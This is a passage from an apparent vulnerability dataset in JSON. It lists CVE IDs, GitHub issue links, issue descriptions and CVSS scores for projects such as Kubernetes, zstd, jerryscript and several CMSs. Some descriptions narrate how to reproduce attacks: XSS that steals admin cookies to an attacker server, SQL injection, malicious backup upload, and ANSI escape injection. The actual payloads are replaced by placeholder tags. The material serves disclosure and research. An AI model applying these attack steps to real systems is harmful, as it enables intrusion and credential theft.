  63457. "Issue_Url_old": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
  63458. "Issue_Url_new": "https://github.com/simonhaenisch/md-to-pdf/issues/99",
  63459. "Repo_new": "simonhaenisch/md-to-pdf",
  63460. "Issue_Created_At": "2021-09-22T07:38:13Z",
  63461. "description": "Security: gray matter exposes front matter JS engine that leads to arbitrary code execution. The library gray matter URLTAG (used by md to pdf to parse front matter) exposes a JS engine by default, which essentially runs eval on the given Markdown. URLTAG Given that md to pdf is _only_ a Markdown to PDF library and looking at how other projects use it I think it is an undesirable _feature_ to be able to execute any arbitrary Javascript by anyone in control of the Markdown content. A possible fix would be to override gray matter's JS engine: APITAG APITAG CODETAG poc.js: CODETAG",
  63462. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63463. "severity": "CRITICAL",
  63464. "baseScore": 9.8,
  63465. "impactScore": 5.9,
  63466. "exploitabilityScore": 3.9
  63467. },
  63468. {
  63469. "CVE_ID": "CVE-2021-23803",
  63470. "Issue_Url_old": "https://github.com/nette/latte/issues/279",
  63471. "Issue_Url_new": "https://github.com/nette/latte/issues/279",
  63472. "Repo_new": "nette/latte",
  63473. "Issue_Created_At": "2021-11-21T07:06:14Z",
  63474. "description": "There is a way to bypass APITAG Version NUMBERTAG Bug Description There is a way to bypass APITAG that will affect security. Steps To Reproduce ERRORTAG This will execute the system function. Expected Behavior Should throw an error not allowed by system function Possible Solution Use rigorous regular expression segmentation, or add more rigorous judgments in ERRORTAG function",
  63475. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63476. "severity": "CRITICAL",
  63477. "baseScore": 9.8,
  63478. "impactScore": 5.9,
  63479. "exploitabilityScore": 3.9
  63480. },
  63481. {
  63482. "CVE_ID": "CVE-2021-24031",
  63483. "Issue_Url_old": "https://github.com/facebook/zstd/issues/1630",
  63484. "Issue_Url_new": "https://github.com/facebook/zstd/issues/1630",
  63485. "Repo_new": "facebook/zstd",
  63486. "Issue_Created_At": "2019-06-04T18:29:11Z",
  63487. "description": "zstd adds read permissions to files while being compressed or uncompressed. While the final file mode is reflective of the input file, when compressing or uncompressing, the file can temporarily gain greater permissions than the input and potentially leading to security issues (especially if large files are being handled). Example: file has mode NUMBERTAG zstd file > APITAG has mode NUMBERTAG while compression is happening. APITAG happens with ERRORTAG and file )",
  63488. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  63489. "severity": "MEDIUM",
  63490. "baseScore": 5.5,
  63491. "impactScore": 3.6,
  63492. "exploitabilityScore": 1.8
  63493. },
  63494. {
  63495. "CVE_ID": "CVE-2021-24032",
  63496. "Issue_Url_old": "https://github.com/facebook/zstd/issues/2491",
  63497. "Issue_Url_new": "https://github.com/facebook/zstd/issues/2491",
  63498. "Repo_new": "facebook/zstd",
  63499. "Issue_Created_At": "2021-02-11T07:41:51Z",
  63500. "description": "Race condition allows attacker to access world readable destination file. The patches for NUMBERTAG still create the file with the default umask, before chmod'ing down to NUMBERTAG so an attacker could still open it in the meantime. inotify can for instance help automating such an attack. zstd should either set the mode directly through open NUMBERTAG or use umask NUMBERTAG before creating the file. This is Debian bug CVETAG",
  63501. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  63502. "severity": "MEDIUM",
  63503. "baseScore": 4.7,
  63504. "impactScore": 3.6,
  63505. "exploitabilityScore": 1.0
  63506. },
  63507. {
  63508. "CVE_ID": "CVE-2021-24241",
  63509. "Issue_Url_old": "https://github.com/jdordonezn/Reflected-XSS-in-WordPress-for-ACF-PRO-before-5.9.1-plugin/issues/1",
  63510. "Issue_Url_new": "https://github.com/jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin/issues/1",
  63511. "Repo_new": "jdordonezn/reflected-xss-in-wordpress-for-acf-pro-before-5.9.1-plugin",
  63512. "Issue_Created_At": "2021-01-20T17:51:53Z",
  63513. "description": "Reflected XSS in APITAG for APITAG Custom Fields PRO' plugin. APITAG allows APITAG site Scripting Reflected' in resource FILETAG , because the call an update page of Advanced Custom Fields PRO APITAG before NUMBERTAG plugin, enable injections of APITAG code. Steps to reproduce the vulnerability NUMBERTAG Add the payload XSS at the end of the url, so: URLTAG \"> APITAG alert('XSS') APITAG NUMBERTAG However, after of try some payloads I see the FILETAG NUMBERTAG I found a way to bypass this problem, in the request replace FILETAG NUMBERTAG Now, is time for making the script for sending cookies of administrator user to evil server of hacker, for example FILETAG NUMBERTAG Of course, previously must encode in URL the payload that calls previous script, so URLTAG APITAG FILETAG NUMBERTAG Send the payload and you will see two request, the first make a promise for sending the cookies and second is where the promise is executed. FILETAG NUMBERTAG Now the hacker has cookies of administrator user in the evil server. FILETAG Remediation I held messages with the dev team of Advanced Custom Fields, they fixed the vulnerability in the versi\u00f3n NUMBERTAG of ACF PRO, here is the report URLTAG",
  63514. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63515. "severity": "MEDIUM",
  63516. "baseScore": 6.1,
  63517. "impactScore": 2.7,
  63518. "exploitabilityScore": 2.8
  63519. },
  63520. {
  63521. "CVE_ID": "CVE-2021-25313",
  63522. "Issue_Url_old": "https://github.com/rancher/rancher/issues/31583",
  63523. "Issue_Url_new": "https://github.com/rancher/rancher/issues/31583",
  63524. "Repo_new": "rancher/rancher",
  63525. "Issue_Created_At": "2021-03-04T05:15:24Z",
  63526. "description": "PH NUMBERTAG",
  63527. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63528. "severity": "MEDIUM",
  63529. "baseScore": 6.1,
  63530. "impactScore": 2.7,
  63531. "exploitabilityScore": 2.8
  63532. },
  63533. {
  63534. "CVE_ID": "CVE-2021-25735",
  63535. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/100096",
  63536. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/100096",
  63537. "Repo_new": "kubernetes/kubernetes",
  63538. "Issue_Created_At": "2021-03-10T18:18:01Z",
  63539. "description": "APITAG",
  63540. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
  63541. "severity": "MEDIUM",
  63542. "baseScore": 6.5,
  63543. "impactScore": 5.2,
  63544. "exploitabilityScore": 1.2
  63545. },
  63546. {
  63547. "CVE_ID": "CVE-2021-25737",
  63548. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/102106",
  63549. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/102106",
  63550. "Repo_new": "kubernetes/kubernetes",
  63551. "Issue_Created_At": "2021-05-18T19:14:27Z",
  63552. "description": "CVETAG : Holes in APITAG Validation Enable Host Network Hijack. Issue Details A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link local range, but the same validation was not performed on APITAG IPs. This issue has been rated Low ( PATHTAG URLTAG , and assigned CVETAG . Affected Component kube apiserver Affected Versions NUMBERTAG APITAG APITAG were not enabled by default in NUMBERTAG Fixed Versions This issue is fixed in the following versions NUMBERTAG Mitigation To mitigate this vulnerability without upgrading kube apiserver, you can create a validating admission webhook that prevents APITAG with endpoint addresses in the APITAG and APITAG ranges. If you have an existing admission policy mechanism (like OPA Gatekeeper) you can create a policy that enforces this restriction. Detection To detect whether this vulnerability has been exploited, you can list APITAG and check for endpoint addresses in the APITAG and APITAG ranges. If you find evidence that this vulnerability has been exploited, please contact security APITAG Acknowledgements This vulnerability was reported by John Howard of Google.",
  63553. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  63554. "severity": "MEDIUM",
  63555. "baseScore": 4.8,
  63556. "impactScore": 2.7,
  63557. "exploitabilityScore": 1.7
  63558. },
  63559. {
  63560. "CVE_ID": "CVE-2021-25740",
  63561. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/103675",
  63562. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/103675",
  63563. "Repo_new": "kubernetes/kubernetes",
  63564. "Issue_Created_At": "2021-07-14T03:30:07Z",
  63565. "description": "WIP.",
  63566. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
  63567. "severity": "LOW",
  63568. "baseScore": 3.1,
  63569. "impactScore": 1.4,
  63570. "exploitabilityScore": 1.6
  63571. },
  63572. {
  63573. "CVE_ID": "CVE-2021-25741",
  63574. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104980",
  63575. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104980",
  63576. "Repo_new": "kubernetes/kubernetes",
  63577. "Issue_Created_At": "2021-09-13T20:58:56Z",
  63578. "description": "PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
  63579. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  63580. "severity": "HIGH",
  63581. "baseScore": 8.1,
  63582. "impactScore": 5.2,
  63583. "exploitabilityScore": 2.8
  63584. },
  63585. {
  63586. "CVE_ID": "CVE-2021-25743",
  63587. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101695",
  63588. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101695",
  63589. "Repo_new": "kubernetes/kubernetes",
  63590. "Issue_Created_At": "2021-05-02T12:06:24Z",
  63591. "description": "ANSI escape characters in Event JSON objects are not being filtered. It is a security issue, but after contacting security APITAG Tim and the team confirmed that they are comfortable posting it publicly. What happened: Kubernetes doesn't sanitize the 'message' field in the Event JSON objects. Notice that this is relevant only to JSON objects, not YAML objects. By creating new event, we can insert ANSI escape characters inside the \"message\" field, like: APITAG This an example of such JSON request: CODETAG The codes: APITAG > Clean the screen and history APITAG > Clean the entire screen and delete all lines saved in the scrollback buffer APITAG > Moves the cursor position to row NUMBERTAG column NUMBERTAG beginning). APITAG > Set the colors APITAG > Move the cursor forward NUMBERTAG steps APITAG > Set the text colors to white The result is that the text was spoofed, and we could spoof the events, create hidden events, or hide other events. What you expected to happen: The ANSI escape characters will be filtered so they couldn't affect the terminal (i.e. using embeded ANSI colors won't do anything to the terminal). Or maybe some message that says that you can't use ANSI escape characters. How to reproduce it (as minimally and precisely as possible NUMBERTAG Run this code: CODETAG It will create a new event NUMBERTAG Run kubectl get events , you will see that the screen was clear, you will get a \"spoof\" message, and all the rest events or columns were gone. Anything else we need to know?: It might look like a low severity issue, but there are other variety of things we can do, from APITAG by using colors to hide all the events, changing the title of the terminal window, and spoof the data. It can affect other systems that are using Kubernetes events, such as monitoring applications. It doesn't have to be only the Kubernetes events. 
There might be other vulnerable objects that we didn't find or other systems that create new objects that count on this mechanism. ANSI escape characters were used to abuse terminals emulators and even cause code execution if the terminal is vulnerable (like CVETAG ). Environment: Kubernetes version (use kubectl version ): CODETAG Cloud provider or hardware configuration: OS (e.g: APITAG ): ERRORTAG Kernel (e.g. ERRORTAG ): APITAG Install tools: minikube APITAG Network plugin and version (if this is a network related bug): Others: we also reproduced it in Kubernetes (not minikube) version NUMBERTAG",
  63592. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:N",
  63593. "severity": "LOW",
  63594. "baseScore": 3.0,
  63595. "impactScore": 1.4,
  63596. "exploitabilityScore": 1.3
  63597. },
  63598. {
  63599. "CVE_ID": "CVE-2021-25745",
  63600. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8502",
  63601. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8502",
  63602. "Repo_new": "kubernetes/ingress-nginx",
  63603. "Issue_Created_At": "2022-04-22T16:18:21Z",
  63604. "description": "Placeholder.",
  63605. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  63606. "severity": "HIGH",
  63607. "baseScore": 8.1,
  63608. "impactScore": 5.2,
  63609. "exploitabilityScore": 2.8
  63610. },
  63611. {
  63612. "CVE_ID": "CVE-2021-25746",
  63613. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8503",
  63614. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8503",
  63615. "Repo_new": "kubernetes/ingress-nginx",
  63616. "Issue_Created_At": "2022-04-22T16:18:27Z",
  63617. "description": "Placeholder.",
  63618. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  63619. "severity": "HIGH",
  63620. "baseScore": 7.1,
  63621. "impactScore": 4.2,
  63622. "exploitabilityScore": 2.8
  63623. },
  63624. {
  63625. "CVE_ID": "CVE-2021-25783",
  63626. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/5",
  63627. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/5",
  63628. "Repo_new": "taogogo/taocms",
  63629. "Issue_Created_At": "2021-01-05T06:47:47Z",
  63630. "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a SQL blind injection vulnerability in the location of name: FILETAG FILETAG PATHTAG",
  63631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  63632. "severity": "HIGH",
  63633. "baseScore": 7.2,
  63634. "impactScore": 5.9,
  63635. "exploitabilityScore": 1.2
  63636. },
  63637. {
  63638. "CVE_ID": "CVE-2021-25784",
  63639. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/4",
  63640. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/4",
  63641. "Repo_new": "taogogo/taocms",
  63642. "Issue_Created_At": "2021-01-05T06:45:53Z",
  63643. "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a blind SQL injection vulnerability in the location of id: FILETAG FILETAG FILETAG PATHTAG",
  63644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  63645. "severity": "HIGH",
  63646. "baseScore": 7.2,
  63647. "impactScore": 5.9,
  63648. "exploitabilityScore": 1.2
  63649. },
  63650. {
  63651. "CVE_ID": "CVE-2021-25785",
  63652. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/3",
  63653. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/3",
  63654. "Repo_new": "taogogo/taocms",
  63655. "Issue_Created_At": "2021-01-05T06:42:31Z",
  63656. "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG Let's click \"add article\" on the left: URLTAG FILETAG Wow! FILETAG POC: FILETAG APITAG",
  63657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  63658. "severity": "MEDIUM",
  63659. "baseScore": 4.8,
  63660. "impactScore": 2.7,
  63661. "exploitabilityScore": 1.7
  63662. },
  63663. {
  63664. "CVE_ID": "CVE-2021-25808",
  63665. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1298",
  63666. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1298",
  63667. "Repo_new": "bludit/bludit",
  63668. "Issue_Created_At": "2021-01-05T10:41:41Z",
  63669. "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG Hi,I found a code execution vulnerability in Bludit NUMBERTAG admin panel the path is PATHTAG NUMBERTAG Log in to the admin panel FILETAG NUMBERTAG Click the backups button FILETAG NUMBERTAG Making evil backup zip First download a backup FILETAG then use this zip to modify Place FILETAG file in path PATHTAG FILETAG FILETAG Package NUMBERTAG as FILETAG FILETAG Execute the script to generate the md5 for the .BLUDIT_BACKUP FILETAG NUMBERTAG upload the evil backup zip FILETAG NUMBERTAG Click the restore backup button FILETAG NUMBERTAG Access the evil file PATHTAG FILETAG",
  63670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63671. "severity": "HIGH",
  63672. "baseScore": 7.8,
  63673. "impactScore": 5.9,
  63674. "exploitabilityScore": 1.8
  63675. },
  63676. {
  63677. "CVE_ID": "CVE-2021-25834",
  63678. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/686",
  63679. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/686",
  63680. "Repo_new": "cosmos/ethermint",
  63681. "Issue_Created_At": "2021-01-06T02:39:29Z",
  63682. "description": "Weak noncecheck lead to replay of transactions. Vulnerability Overview: Since there is no explicit NUMBERTAG limit on the nonce check used by ethermint, this results in transactions passing the antehandler checksum as long as they are greater than the node\u2019s cached nonce. If the victim sends a very large nonce transaction, the attacker can replay the transaction. Details and Root Cause: First, we found some ground truths: As long as the APITAG is larger than the current node\u2019s cache nonce, it will pass both noncecheck. Signaturecheck uses the nonce field of the transaction itself, so transactions larger than the current cached nonce can still pass signaturecheck. Thus, if a msg have a large nonce,then it can be replaied. Steps to Exploit: Suppose the victim sends a nonce that is much larger than the current node\u2019s cache. An attacker can replay this transaction.",
  63683. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63684. "severity": "HIGH",
  63685. "baseScore": 7.5,
  63686. "impactScore": 3.6,
  63687. "exploitabilityScore": 3.9
  63688. },
  63689. {
  63690. "CVE_ID": "CVE-2021-25835",
  63691. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/687",
  63692. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/687",
  63693. "Repo_new": "cosmos/ethermint",
  63694. "Issue_Created_At": "2021-01-06T03:01:00Z",
  63695. "description": "Replay Tx on another Chain. Vulnerability Overview: Since ethermint uses the same type of APITAG for ethereum compatibility, a verified signature in ethereum is still valid in ethermint with the same msg content and APITAG which enables \"cross chain transaction replay\" attack etc. Details and Root Cause: First, we found some ground truths NUMBERTAG Both ethermint and ethereum have the same signature scheme NUMBERTAG User has the same public key and private key on ethermint and ethereum NUMBERTAG Different APITAG can be parsed to a same APITAG such as \"ethereum NUMBERTAG and \"erhermint NUMBERTAG Thus, if a msg successfully executed on ethereum of some APITAG say NUMBERTAG mainnet), then it can be replaied on ethermint of the same APITAG (with the nonce check passed), and vice versa. Steps to Exploit NUMBERTAG Suppose that there are two chains. One's APITAG is APITAG NUMBERTAG the other is APITAG APITAG victim have accounts on both chains with the same public key (private key NUMBERTAG The victim transfer NUMBERTAG eth to the attacker,and the victim's APITAG on APITAG NUMBERTAG is NUMBERTAG The victim's APITAG on APITAG NUMBERTAG is NUMBERTAG or less than APITAG the previously mentioned vulnerability can greatly reduce the difficulty of exploiting this vulnerability only need to meet the nonce of the replayed chain than the nonce of the replayed chain can be low NUMBERTAG The attacker replay the APITAG on APITAG NUMBERTAG",
  63696. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63697. "severity": "HIGH",
  63698. "baseScore": 7.5,
  63699. "impactScore": 3.6,
  63700. "exploitabilityScore": 3.9
  63701. },
  63702. {
  63703. "CVE_ID": "CVE-2021-25836",
  63704. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/667",
  63705. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/667",
  63706. "Repo_new": "cosmos/ethermint",
  63707. "Issue_Created_At": "2020-12-21T14:41:21Z",
  63708. "description": "There may be dirty data when exec evm transaction with multi msgs. APITAG info:__ APITAG Ethermint commit, operating system name, and other relevant details] branch development APITAG info:__ APITAG gist of relevant config, logs, etc.] The storage data and code from APITAG are written to the keeper at the time of the handler and are cleared at the endblock stage. If there are NUMBERTAG msgs in a tx, in the APITAG (handler) stage, where msg1 executes successfully and msg2 fails, then all store data will be rolled back. However, the storage data in APITAG and the code are still Reserved, if another t NUMBERTAG is executed later in the APITAG phase, the dirty data from t NUMBERTAG will be used",
  63709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63710. "severity": "HIGH",
  63711. "baseScore": 7.5,
  63712. "impactScore": 3.6,
  63713. "exploitabilityScore": 3.9
  63714. },
  63715. {
  63716. "CVE_ID": "CVE-2021-25863",
  63717. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/764",
  63718. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/764",
  63719. "Repo_new": "open5gs/open5gs",
  63720. "Issue_Created_At": "2021-01-15T11:49:05Z",
  63721. "description": "Security flaw in default configuration of webui. Details The configuration of webui might result in the control panel being taken over by arbitrary user via default username and password. The lines of code below indicate that, if not specified, the server will listen on APITAG , which means the control panel could be accessed via WAN. CODETAG On APITAG , the code will create a default account APITAG , if there isn't any account specified in APITAG ERRORTAG Proof of Concept After doing a query via Zoomeye, a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters, several valid cases have been found: CODETAG FILETAG Suggestion The default account should never be assigned.",
  63722. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63723. "severity": "HIGH",
  63724. "baseScore": 8.8,
  63725. "impactScore": 5.9,
  63726. "exploitabilityScore": 2.8
  63727. },
  63728. {
  63729. "CVE_ID": "CVE-2021-25864",
  63730. "Issue_Url_old": "https://github.com/Foddy/node-red-contrib-huemagic/issues/217",
  63731. "Issue_Url_new": "https://github.com/foddy/node-red-contrib-huemagic/issues/217",
  63732. "Repo_new": "foddy/node-red-contrib-huemagic",
  63733. "Issue_Created_At": "2021-01-17T11:35:47Z",
  63734. "description": "Security bug in FILETAG . Describe the bug The APITAG API, errorly used in file APITAG , introduces a Path Traversal vulnerability. URLTAG APITAG Flow to Reproduce Since the path isn't protected by APITAG API. The attacker could fetch arbitrary file on the server. APITAG Expected behavior To fix this vulerability, option of the APITAG should be specified correctly. APITAG",
  63735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  63736. "severity": "HIGH",
  63737. "baseScore": 7.5,
  63738. "impactScore": 3.6,
  63739. "exploitabilityScore": 3.9
  63740. },
  63741. {
  63742. "CVE_ID": "CVE-2021-25987",
  63743. "Issue_Url_old": "https://github.com/hexojs/hexo/issues/4838",
  63744. "Issue_Url_new": "https://github.com/hexojs/hexo/issues/4838",
  63745. "Repo_new": "hexojs/hexo",
  63746. "Issue_Created_At": "2021-12-14T19:12:15Z",
  63747. "description": "Announcement: About CVETAG . Hexo team is already aware of the CVETAG , and we have already implemented a fix APITAG PR URLTAG However, we will not release a minor version. The fix will be included in the next major version of Hexo (which will be NUMBERTAG The fix (which will enable HTML entities escaping by default) is considered as a breaking change and we notice that it could break many current themes. Also, you should be aware that, Hexo is only a static site generator. It only generates static HTML from the source from your local computer (or your server). It is impossible for anyone other than you to modify your hexo theme or your blog post without physical access to your computer or login to your server. That's to say, in order for anyone to perform an attack based on the CVETAG , the hacker will have to hack into your computer or your server to modify your blog posts . But if that really happens (your local computer or server being compromised), the hacker can basically do anything anyway. If you host the source code of your Hexo site on a server and use some kind of web editor (like APITAG ), it is possible for hackers to modify your post through such a web editor (without login to your server). We recommend you to use some kind of authentication to protect your web editor (which you should always have even without this CVE. You don't want anybody to modify your post, right?). APITAG we mentioned earlier has a built in username & password configuration in the first day (so you will not be affected if you use a strong password). In short, it is not a Stored XSS or a Reflect XSS. It is a Self XSS APITAG XSS yourself, or a hacker to hack into your computer or server to perform the XSS attack). And your website will work flawlessly and sound even without we release a fix.",
  63748. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  63749. "severity": "MEDIUM",
  63750. "baseScore": 4.6,
  63751. "impactScore": 2.7,
  63752. "exploitabilityScore": 1.5
  63753. },
  63754. {
  63755. "CVE_ID": "CVE-2021-26194",
  63756. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4445",
  63757. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4445",
  63758. "Repo_new": "jerryscript-project/jerryscript",
  63759. "Issue_Created_At": "2021-01-11T13:28:31Z",
  63760. "description": "heap use after free in ecma_is_lexical_environment. APITAG revision fdaacde6 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63761. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63762. "severity": "MEDIUM",
  63763. "baseScore": 6.5,
  63764. "impactScore": 3.6,
  63765. "exploitabilityScore": 2.8
  63766. },
  63767. {
  63768. "CVE_ID": "CVE-2021-26195",
  63769. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4442",
  63770. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4442",
  63771. "Repo_new": "jerryscript-project/jerryscript",
  63772. "Issue_Created_At": "2021-01-11T13:04:23Z",
  63773. "description": "heap buffer overflow in lexer_parse_number. APITAG revision fdaacde Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63774. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63775. "severity": "HIGH",
  63776. "baseScore": 8.8,
  63777. "impactScore": 5.9,
  63778. "exploitabilityScore": 2.8
  63779. },
  63780. {
  63781. "CVE_ID": "CVE-2021-26197",
  63782. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4403",
  63783. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4403",
  63784. "Repo_new": "jerryscript-project/jerryscript",
  63785. "Issue_Created_At": "2021-01-02T14:31:59Z",
  63786. "description": "SEGV in APITAG APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63787. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63788. "severity": "MEDIUM",
  63789. "baseScore": 6.5,
  63790. "impactScore": 3.6,
  63791. "exploitabilityScore": 2.8
  63792. },
  63793. {
  63794. "CVE_ID": "CVE-2021-26198",
  63795. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4402",
  63796. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4402",
  63797. "Repo_new": "jerryscript-project/jerryscript",
  63798. "Issue_Created_At": "2021-01-02T14:29:48Z",
  63799. "description": "SEVG in ecma_deref_bigint. APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63800. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63801. "severity": "MEDIUM",
  63802. "baseScore": 6.5,
  63803. "impactScore": 3.6,
  63804. "exploitabilityScore": 2.8
  63805. },
  63806. {
  63807. "CVE_ID": "CVE-2021-26199",
  63808. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4056",
  63809. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4056",
  63810. "Repo_new": "jerryscript-project/jerryscript",
  63811. "Issue_Created_At": "2020-07-25T14:58:50Z",
  63812. "description": "heap use after free in ecma_bytecode_ref. APITAG revision da5b NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  63813. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63814. "severity": "MEDIUM",
  63815. "baseScore": 6.5,
  63816. "impactScore": 3.6,
  63817. "exploitabilityScore": 2.8
  63818. },
  63819. {
  63820. "CVE_ID": "CVE-2021-26259",
  63821. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/417",
  63822. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/417",
  63823. "Repo_new": "michaelrsweet/htmldoc",
  63824. "Issue_Created_At": "2021-01-26T08:58:27Z",
  63825. "description": "APITAG heap buffer overflow on APITAG ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in the APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63826. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63827. "severity": "HIGH",
  63828. "baseScore": 7.8,
  63829. "impactScore": 5.9,
  63830. "exploitabilityScore": 1.8
  63831. },
  63832. {
  63833. "CVE_ID": "CVE-2021-26528",
  63834. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1201",
  63835. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1201",
  63836. "Repo_new": "cesanta/mongoose",
  63837. "Issue_Created_At": "2021-01-23T13:57:54Z",
